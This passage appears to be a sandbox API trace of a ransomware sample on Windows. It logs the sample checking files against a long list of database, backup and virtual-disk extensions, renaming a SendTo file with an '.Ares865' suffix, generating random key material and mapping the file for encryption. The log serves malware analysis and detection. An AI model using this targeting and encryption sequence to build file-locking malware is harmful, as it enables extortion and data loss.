lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2=".lnk") returned 1 [0059.047] lstrlenW (lpString=".ini") returned 4 [0059.047] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2=".ini") returned 1 [0059.047] lstrlenW (lpString=".sys") returned 4 [0059.047] lstrcmpiW (lpString1="Mail Recipient.MAPIMail", lpString2=".sys") returned 1 [0059.047] lstrlenW (lpString="Mail Recipient.MAPIMail") returned 23 [0059.047] lstrlenW (lpString="bak") returned 3 [0059.047] lstrcmpiW (lpString1="ail", lpString2="bak") returned -1 [0059.047] lstrlenW (lpString="ba_") returned 3 [0059.047] lstrcmpiW (lpString1="ail", lpString2="ba_") returned -1 [0059.047] lstrlenW (lpString="dbb") returned 3 [0059.047] lstrcmpiW (lpString1="ail", lpString2="dbb") returned -1 [0059.047] lstrlenW (lpString="vmdk") returned 4 [0059.047] lstrcmpiW (lpString1="Mail", lpString2="vmdk") returned -1 [0059.047] lstrlenW (lpString="rar") returned 3 [0059.047] lstrcmpiW (lpString1="ail", lpString2="rar") returned -1 [0059.047] lstrlenW (lpString="zip") returned 3 [0059.047] lstrcmpiW (lpString1="ail", lpString2="zip") returned -1 [0059.047] lstrlenW (lpString="tgz") returned 3 [0059.047] lstrcmpiW (lpString1="ail", lpString2="tgz") returned -1 [0059.047] lstrlenW (lpString="vbox") returned 4 [0059.047] lstrcmpiW (lpString1="Mail", lpString2="vbox") returned -1 [0059.047] lstrlenW (lpString="vdi") returned 3 [0059.047] lstrcmpiW (lpString1="ail", lpString2="vdi") returned -1 [0059.047] lstrlenW (lpString="vhd") returned 3 [0059.047] lstrcmpiW (lpString1="ail", lpString2="vhd") returned -1 [0059.047] lstrlenW (lpString="vhdx") returned 4 [0059.047] lstrcmpiW (lpString1="Mail", lpString2="vhdx") returned -1 [0059.047] lstrlenW (lpString="avhd") returned 4 [0059.047] lstrcmpiW (lpString1="Mail", lpString2="avhd") returned 1 [0059.047] lstrlenW (lpString="db") returned 2 [0059.047] lstrcmpiW (lpString1="il", lpString2="db") returned 1 [0059.047] lstrlenW (lpString="db2") returned 3 [0059.047] lstrcmpiW (lpString1="ail", lpString2="db2") returned -1 [0059.047] lstrlenW (lpString="db3") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="db3") returned -1 [0059.048] lstrlenW (lpString="dbf") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="dbf") returned -1 [0059.048] lstrlenW (lpString="mdf") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="mdf") returned -1 [0059.048] lstrlenW (lpString="mdb") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="mdb") returned -1 [0059.048] lstrlenW (lpString="sql") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="sql") returned -1 [0059.048] lstrlenW (lpString="sqlite") returned 6 [0059.048] lstrcmpiW (lpString1="PIMail", lpString2="sqlite") returned -1 [0059.048] lstrlenW (lpString="sqlite3") returned 7 [0059.048] lstrcmpiW (lpString1="APIMail", lpString2="sqlite3") returned -1 [0059.048] lstrlenW (lpString="sqlitedb") returned 8 [0059.048] lstrcmpiW (lpString1="MAPIMail", lpString2="sqlitedb") returned -1 [0059.048] lstrlenW (lpString="xml") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="xml") returned -1 [0059.048] lstrlenW (lpString="$er") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="$er") returned 1 [0059.048] lstrlenW (lpString="4dd") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="4dd") returned 1 [0059.048] lstrlenW (lpString="4dl") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="4dl") returned 1 [0059.048] lstrlenW (lpString="^^^") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="^^^") returned 1 [0059.048] lstrlenW (lpString="abs") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="abs") returned 1 [0059.048] lstrlenW (lpString="abx") returned 3 [0059.048] lstrcmpiW (lpString1="ail", lpString2="abx") returned 1 [0059.048] lstrlenW (lpString="accdb") returned 5 [0059.048] lstrcmpiW (lpString1="IMail", lpString2="accdb") returned 1 [0059.048] lstrlenW (lpString="accdc") returned 5 [0059.048] lstrcmpiW (lpString1="IMail", lpString2="accdc") returned 1 [0059.048] lstrlenW (lpString="accde") returned 5 [0059.048] lstrcmpiW (lpString1="IMail", lpString2="accde") returned 1 [0059.048] lstrlenW (lpString="accdr") returned 5 [0059.048] lstrcmpiW (lpString1="IMail", lpString2="accdr") returned 1 [0059.048] lstrlenW (lpString="accdt") returned 5 [0059.049] lstrcmpiW (lpString1="IMail", lpString2="accdt") returned 1 [0059.049] lstrlenW (lpString="accdw") returned 5 [0059.049] lstrcmpiW (lpString1="IMail", lpString2="accdw") returned 1 [0059.049] lstrlenW (lpString="accft") returned 5 [0059.049] lstrcmpiW (lpString1="IMail", lpString2="accft") returned 1 [0059.049] lstrlenW (lpString="adb") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="adb") returned 1 [0059.049] lstrlenW (lpString="adb") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="adb") returned 1 [0059.049] lstrlenW (lpString="ade") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="ade") returned 1 [0059.049] lstrlenW (lpString="adf") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="adf") returned 1 [0059.049] lstrlenW (lpString="adn") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="adn") returned 1 [0059.049] lstrlenW (lpString="adp") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="adp") returned 1 [0059.049] lstrlenW (lpString="alf") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="alf") returned -1 [0059.049] lstrlenW (lpString="ask") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="ask") returned -1 [0059.049] lstrlenW (lpString="btr") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="btr") returned -1 [0059.049] lstrlenW (lpString="cat") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="cat") returned -1 [0059.049] lstrlenW (lpString="cdb") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="cdb") returned -1 [0059.049] lstrlenW (lpString="ckp") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="ckp") returned -1 [0059.049] lstrlenW (lpString="cma") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="cma") returned -1 [0059.049] lstrlenW (lpString="cpd") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="cpd") returned -1 [0059.049] lstrlenW (lpString="dacpac") returned 6 [0059.049] lstrcmpiW (lpString1="PIMail", lpString2="dacpac") returned 1 [0059.049] lstrlenW (lpString="dad") returned 3 [0059.049] lstrcmpiW (lpString1="ail", lpString2="dad") returned -1 [0059.049] lstrlenW (lpString="dadiagrams") returned 10 [0059.050] lstrcmpiW (lpString1="t.MAPIMail", lpString2="dadiagrams") returned 1 [0059.050] lstrlenW (lpString="daschema") returned 8 [0059.050] lstrcmpiW (lpString1="MAPIMail", lpString2="daschema") returned 1 [0059.050] lstrlenW (lpString="db-journal") returned 10 [0059.050] lstrcmpiW (lpString1="t.MAPIMail", lpString2="db-journal") returned 1 [0059.050] lstrlenW (lpString="db-shm") returned 6 [0059.050] lstrcmpiW (lpString1="PIMail", lpString2="db-shm") returned 1 [0059.050] lstrlenW (lpString="db-wal") returned 6 [0059.050] lstrcmpiW (lpString1="PIMail", lpString2="db-wal") returned 1 [0059.050] lstrlenW (lpString="dbc") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dbc") returned -1 [0059.050] lstrlenW (lpString="dbs") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dbs") returned -1 [0059.050] lstrlenW (lpString="dbt") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dbt") returned -1 [0059.050] lstrlenW (lpString="dbv") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dbv") returned -1 [0059.050] lstrlenW (lpString="dbx") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dbx") returned -1 [0059.050] lstrlenW (lpString="dcb") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dcb") returned -1 [0059.050] lstrlenW (lpString="dct") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dct") returned -1 [0059.050] lstrlenW (lpString="dcx") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dcx") returned -1 [0059.050] lstrlenW (lpString="ddl") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="ddl") returned -1 [0059.050] lstrlenW (lpString="dlis") returned 4 [0059.050] lstrcmpiW (lpString1="Mail", lpString2="dlis") returned 1 [0059.050] lstrlenW (lpString="dp1") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dp1") returned -1 [0059.050] lstrlenW (lpString="dqy") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dqy") returned -1 [0059.050] lstrlenW (lpString="dsk") returned 3 [0059.050] lstrcmpiW (lpString1="ail", lpString2="dsk") returned -1 [0059.050] lstrlenW (lpString="dsn") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="dsn") returned -1 [0059.051] lstrlenW (lpString="dtsx") returned 4 [0059.051] lstrcmpiW (lpString1="Mail", lpString2="dtsx") returned 1 [0059.051] lstrlenW (lpString="dxl") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="dxl") returned -1 [0059.051] lstrlenW (lpString="eco") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="eco") returned -1 [0059.051] lstrlenW (lpString="ecx") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="ecx") returned -1 [0059.051] lstrlenW (lpString="edb") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="edb") returned -1 [0059.051] lstrlenW (lpString="epim") returned 4 [0059.051] lstrcmpiW (lpString1="Mail", lpString2="epim") returned 1 [0059.051] lstrlenW (lpString="fcd") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="fcd") returned -1 [0059.051] lstrlenW (lpString="fdb") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="fdb") returned -1 [0059.051] lstrlenW (lpString="fic") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="fic") returned -1 [0059.051] lstrlenW (lpString="flexolibrary") returned 12 [0059.051] lstrcmpiW (lpString1="ent.MAPIMail", lpString2="flexolibrary") returned -1 [0059.051] lstrlenW (lpString="fm5") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="fm5") returned -1 [0059.051] lstrlenW (lpString="fmp") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="fmp") returned -1 [0059.051] lstrlenW (lpString="fmp12") returned 5 [0059.051] lstrcmpiW (lpString1="IMail", lpString2="fmp12") returned 1 [0059.051] lstrlenW (lpString="fmpsl") returned 5 [0059.051] lstrcmpiW (lpString1="IMail", lpString2="fmpsl") returned 1 [0059.051] lstrlenW (lpString="fol") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="fol") returned -1 [0059.051] lstrlenW (lpString="fp3") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="fp3") returned -1 [0059.051] lstrlenW (lpString="fp4") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="fp4") returned -1 [0059.051] lstrlenW (lpString="fp5") returned 3 [0059.051] lstrcmpiW (lpString1="ail", lpString2="fp5") returned -1 [0059.051] lstrlenW (lpString="fp7") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="fp7") returned -1 [0059.052] lstrlenW (lpString="fpt") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="fpt") returned -1 [0059.052] lstrlenW (lpString="frm") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="frm") returned -1 [0059.052] lstrlenW (lpString="gdb") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="gdb") returned -1 [0059.052] lstrlenW (lpString="gdb") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="gdb") returned -1 [0059.052] lstrlenW (lpString="grdb") returned 4 [0059.052] lstrcmpiW (lpString1="Mail", lpString2="grdb") returned 1 [0059.052] lstrlenW (lpString="gwi") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="gwi") returned -1 [0059.052] lstrlenW (lpString="hdb") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="hdb") returned -1 [0059.052] lstrlenW (lpString="his") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="his") returned -1 [0059.052] lstrlenW (lpString="ib") returned 2 [0059.052] lstrcmpiW (lpString1="il", lpString2="ib") returned 1 [0059.052] lstrlenW (lpString="idb") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="idb") returned -1 [0059.052] lstrlenW (lpString="ihx") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="ihx") returned -1 [0059.052] lstrlenW (lpString="itdb") returned 4 [0059.052] lstrcmpiW (lpString1="Mail", lpString2="itdb") returned 1 [0059.052] lstrlenW (lpString="itw") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="itw") returned -1 [0059.052] lstrlenW (lpString="jet") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="jet") returned -1 [0059.052] lstrlenW (lpString="jtx") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="jtx") returned -1 [0059.052] lstrlenW (lpString="kdb") returned 3 [0059.052] lstrcmpiW (lpString1="ail", lpString2="kdb") returned -1 [0059.052] lstrlenW (lpString="kexi") returned 4 [0059.052] lstrcmpiW (lpString1="Mail", lpString2="kexi") returned 1 [0059.052] lstrlenW (lpString="kexic") returned 5 [0059.052] lstrcmpiW (lpString1="IMail", lpString2="kexic") returned -1 [0059.053] lstrlenW (lpString="kexis") returned 5 [0059.053] lstrcmpiW (lpString1="IMail", lpString2="kexis") returned -1 [0059.053] lstrlenW (lpString="lgc") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="lgc") returned -1 [0059.053] lstrlenW (lpString="lwx") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="lwx") returned -1 [0059.053] lstrlenW (lpString="maf") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="maf") returned -1 [0059.053] lstrlenW (lpString="maq") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="maq") returned -1 [0059.053] lstrlenW (lpString="mar") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="mar") returned -1 [0059.053] lstrlenW (lpString="marshal") returned 7 [0059.053] lstrcmpiW (lpString1="APIMail", lpString2="marshal") returned -1 [0059.053] lstrlenW (lpString="mas") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="mas") returned -1 [0059.053] lstrlenW (lpString="mav") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="mav") returned -1 [0059.053] lstrlenW (lpString="maw") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="maw") returned -1 [0059.053] lstrlenW (lpString="mdbhtml") returned 7 [0059.053] lstrcmpiW (lpString1="APIMail", lpString2="mdbhtml") returned -1 [0059.053] lstrlenW (lpString="mdn") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="mdn") returned -1 [0059.053] lstrlenW (lpString="mdt") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="mdt") returned -1 [0059.053] lstrlenW (lpString="mfd") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="mfd") returned -1 [0059.053] lstrlenW (lpString="mpd") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="mpd") returned -1 [0059.053] lstrlenW (lpString="mrg") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="mrg") returned -1 [0059.053] lstrlenW (lpString="mud") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="mud") returned -1 [0059.053] lstrlenW (lpString="mwb") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="mwb") returned -1 [0059.053] lstrlenW (lpString="myd") returned 3 [0059.053] lstrcmpiW (lpString1="ail", lpString2="myd") returned -1 [0059.054] lstrlenW (lpString="ndf") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="ndf") returned -1 [0059.054] lstrlenW (lpString="nnt") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="nnt") returned -1 [0059.054] lstrlenW (lpString="nrmlib") returned 6 [0059.054] lstrcmpiW (lpString1="PIMail", lpString2="nrmlib") returned 1 [0059.054] lstrlenW (lpString="ns2") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="ns2") returned -1 [0059.054] lstrlenW (lpString="ns3") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="ns3") returned -1 [0059.054] lstrlenW (lpString="ns4") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="ns4") returned -1 [0059.054] lstrlenW (lpString="nsf") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="nsf") returned -1 [0059.054] lstrlenW (lpString="nv") returned 2 [0059.054] lstrcmpiW (lpString1="il", lpString2="nv") returned -1 [0059.054] lstrlenW (lpString="nv2") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="nv2") returned -1 [0059.054] lstrlenW (lpString="nwdb") returned 4 [0059.054] lstrcmpiW (lpString1="Mail", lpString2="nwdb") returned -1 [0059.054] lstrlenW (lpString="nyf") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="nyf") returned -1 [0059.054] lstrlenW (lpString="odb") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="odb") returned -1 [0059.054] lstrlenW (lpString="odb") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="odb") returned -1 [0059.054] lstrlenW (lpString="oqy") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="oqy") returned -1 [0059.054] lstrlenW (lpString="ora") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="ora") returned -1 [0059.054] lstrlenW (lpString="orx") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="orx") returned -1 [0059.054] lstrlenW (lpString="owc") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="owc") returned -1 [0059.054] lstrlenW (lpString="p96") returned 3 [0059.054] lstrcmpiW (lpString1="ail", lpString2="p96") returned -1 [0059.054] lstrlenW (lpString="p97") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="p97") returned -1 [0059.055] lstrlenW (lpString="pan") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="pan") returned -1 [0059.055] lstrlenW (lpString="pdb") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="pdb") returned -1 [0059.055] lstrlenW (lpString="pdm") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="pdm") returned -1 [0059.055] lstrlenW (lpString="pnz") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="pnz") returned -1 [0059.055] lstrlenW (lpString="qry") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="qry") returned -1 [0059.055] lstrlenW (lpString="qvd") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="qvd") returned -1 [0059.055] lstrlenW (lpString="rbf") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="rbf") returned -1 [0059.055] lstrlenW (lpString="rctd") returned 4 [0059.055] lstrcmpiW (lpString1="Mail", lpString2="rctd") returned -1 [0059.055] lstrlenW (lpString="rod") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="rod") returned -1 [0059.055] lstrlenW (lpString="rodx") returned 4 [0059.055] lstrcmpiW (lpString1="Mail", lpString2="rodx") returned -1 [0059.055] lstrlenW (lpString="rpd") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="rpd") returned -1 [0059.055] lstrlenW (lpString="rsd") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="rsd") returned -1 [0059.055] lstrlenW (lpString="sas7bdat") returned 8 [0059.055] lstrcmpiW (lpString1="MAPIMail", lpString2="sas7bdat") returned -1 [0059.055] lstrlenW (lpString="sbf") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="sbf") returned -1 [0059.055] lstrlenW (lpString="scx") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="scx") returned -1 [0059.055] lstrlenW (lpString="sdb") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="sdb") returned -1 [0059.055] lstrlenW (lpString="sdc") returned 3 [0059.055] lstrcmpiW (lpString1="ail", lpString2="sdc") returned -1 [0059.056] lstrlenW (lpString="sdf") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="sdf") returned -1 [0059.056] lstrlenW (lpString="sis") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="sis") returned -1 [0059.056] lstrlenW (lpString="spq") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="spq") returned -1 [0059.056] lstrlenW (lpString="te") returned 2 [0059.056] lstrcmpiW (lpString1="il", lpString2="te") returned -1 [0059.056] lstrlenW (lpString="teacher") returned 7 [0059.056] lstrcmpiW (lpString1="APIMail", lpString2="teacher") returned -1 [0059.056] lstrlenW (lpString="tmd") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="tmd") returned -1 [0059.056] lstrlenW (lpString="tps") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="tps") returned -1 [0059.056] lstrlenW (lpString="trc") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="trc") returned -1 [0059.056] lstrlenW (lpString="trc") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="trc") returned -1 [0059.056] lstrlenW (lpString="trm") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="trm") returned -1 [0059.056] lstrlenW (lpString="udb") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="udb") returned -1 [0059.056] lstrlenW (lpString="udl") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="udl") returned -1 [0059.056] lstrlenW (lpString="usr") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="usr") returned -1 [0059.056] lstrlenW (lpString="v12") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="v12") returned -1 [0059.056] lstrlenW (lpString="vis") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="vis") returned -1 [0059.056] lstrlenW (lpString="vpd") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="vpd") returned -1 [0059.056] lstrlenW (lpString="vvv") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="vvv") returned -1 [0059.056] lstrlenW (lpString="wdb") returned 3 [0059.056] lstrcmpiW (lpString1="ail", lpString2="wdb") returned -1 [0059.056] lstrlenW (lpString="wmdb") returned 4 [0059.057] lstrcmpiW (lpString1="Mail", lpString2="wmdb") returned -1 [0059.057] lstrlenW (lpString="wrk") returned 3 [0059.057] lstrcmpiW (lpString1="ail", lpString2="wrk") returned -1 [0059.057] lstrlenW (lpString="xdb") returned 3 [0059.057] lstrcmpiW (lpString1="ail", lpString2="xdb") returned -1 [0059.057] lstrlenW (lpString="xld") returned 3 [0059.057] lstrcmpiW (lpString1="ail", lpString2="xld") returned -1 [0059.057] lstrlenW (lpString="xmlff") returned 5 [0059.057] lstrcmpiW (lpString1="IMail", lpString2="xmlff") returned -1 [0059.057] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\SendTo\\Mail Recipient.MAPIMail.Ares865") returned 60 [0059.057] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\default user\\sendto\\mail recipient.mapimail"), lpNewFileName="C:\\Users\\Default User\\SendTo\\Mail Recipient.MAPIMail.Ares865" (normalized: "c:\\users\\default user\\sendto\\mail recipient.mapimail.ares865"), dwFlags=0x1) returned 1 [0059.059] CreateFileW (lpFileName="C:\\Users\\Default User\\SendTo\\Mail Recipient.MAPIMail.Ares865" (normalized: "c:\\users\\default user\\sendto\\mail recipient.mapimail.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0059.059] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4) returned 1 [0059.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0059.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0059.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0059.059] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0059.060] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0059.060] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0059.061] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x15c [0059.064] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x190000 [0059.073] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0059.074] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.074] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0059.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0059.074] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0059.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.074] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.074] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cbdb0 [0059.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbdb0 | out: hHeap=0x2b0000) returned 1 [0059.075] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.075] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.075] CloseHandle (hObject=0x15c) returned 1 [0059.075] CloseHandle (hObject=0x118) returned 1 [0059.076] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0059.076] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0059.076] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0059.076] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9c48085e, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x63dece0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3bb9ed75, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail", cAlternateFileName="MAILRE~1.MAP")) returned 0 [0059.076] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0059.076] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d22e8 [0059.077] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Searches", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Searches") returned="C:\\Users\\Default User\\Searches" [0059.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e64c8 | out: hHeap=0x2b0000) returned 1 [0059.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0059.077] lstrlenW (lpString="C:\\Users\\Default User\\Searches") returned 30 [0059.077] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Searches" | out: lpString1="C:\\Users\\Default 